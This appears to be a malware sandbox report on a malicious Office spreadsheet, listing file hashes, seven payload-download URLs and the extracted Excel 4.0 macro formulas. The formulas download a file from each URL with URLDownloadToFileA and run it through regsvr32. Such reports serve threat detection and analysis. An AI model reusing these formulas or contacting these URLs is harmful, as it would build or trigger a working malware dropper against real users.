General
-
Target
bb42d6b328809cc8faa78cce1d1691ee437bef758938a898854ea41a489c0211
-
Size
35KB
-
MD5
cba1c6d5cb2dc683daab13a669706be7
-
SHA1
4c64d8c39a3e06b2cfbd1861d3f40f258f537b36
-
SHA256
bb42d6b328809cc8faa78cce1d1691ee437bef758938a898854ea41a489c0211
-
SHA512
09f50bb134824479dc6d59fe60b9b6829d33a7e87cb6ad6ad245acc2ee8884f053a0be7a267889c6c6d1e5f048b7614f1dd4acafacf3c431d271a9c2107da2ca
-
SSDEEP
768:aYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:aYKtmg+UOZZ1ZYpoQ/pMAm
Malware Config
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
bb42d6b328809cc8faa78cce1d1691ee437bef758938a898854ea41a489c0211